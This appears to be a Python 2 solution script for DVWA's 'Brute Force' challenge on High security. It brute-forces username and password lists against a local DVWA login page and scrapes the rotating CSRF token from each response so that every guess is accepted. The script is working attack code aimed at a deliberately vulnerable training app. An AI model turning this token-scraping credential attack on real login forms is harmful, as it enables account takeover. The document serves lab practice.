DVWA Brute Force Hard - CSRF Token

1. ############################################################################################################################################################################################################################
2. #   DVWA Brute Force High: CSRF Token
3. #  
4. #   Solution to the Brute Force section on High Security - brute forces the password, extracting the CSRF token
5. #   from the page to use in the next guess
6. #  
7. ############################################################################################################################################################################################################################
8.  
9.  
10. import httplib
11. import re
12.  
13. # CSRF token of the format:
14. # <input type="hidden" name="user_token" value="b59fc306cc2b62fc89667c2f42122e1f">
15.  
16. request = "/dvwa/vulnerabilities/brute/index.php?username=^USER^&password=^PASS^&Login=Login&user_token=^USERTOKEN^"
17. #username = "admin"
18. passwordfile = 'C:\Users\Administrator\Desktop\pass.txt'
19. usersfile = 'C:\Users\Administrator\Desktop\user.txt'
20. cookies = "security=high; PHPSESSID=6ek9h8fph3mtr8lunrpoa0jq06"
21.  
22. failtext = "Username and/or password incorrect."
23.  
24. with open(passwordfile) as f:
25.     passwords = f.readlines()
26.  
27. with open(usersfile) as f:
28.     usernames = f.readlines()
29.    
30. for username in usernames:
31.     username = username.strip()
32.    
33.     #Collect the first CSRF token
34.     conn = httplib.HTTPConnection("127.0.0.1")     
35.     conn.request("GET", "/dvwa/vulnerabilities/brute/index.php", "", {"Cookie": cookies})
36.     result = conn.getresponse()
37.     #print result
38.     #print result.status, result.reason
39.     data = result.read()
40.     #print '{', data, '}'
41.     csrf_pattern = "<input type='hidden' name='user_token' value='(.*?)' />"
42.     m = re.search(csrf_pattern, data)
43.     user_token = m.group(1)
44.     print "Working on user ", username
45.     print "INITIAL CSRF TOKEN :", user_token
46.    
47.     for password in passwords:
48.         password = password.strip()
49.         conn = httplib.HTTPConnection("127.0.0.1")     
50.         requestParams = request.replace("^USER^", username)
51.         requestParams = requestParams.replace("^PASS^", password).replace("^USERTOKEN^", user_token)
52.         #print requestParams
53.         conn.request("GET", requestParams, "", {"Cookie": cookies})
54.         result = conn.getresponse()
55.         #print result.status, result.reason
56.         data = result.read()   
57.         if failtext in data:
58.             #print "Incorrect password attempted. ", password      
59.             pass
60.         else:
61.             print "Found correct password:", username, password
62.             break
63.         m = re.search(csrf_pattern, data)
64.         user_token = m.group(1)
65.         #print "NEXT CSRF TOKEN :", user_token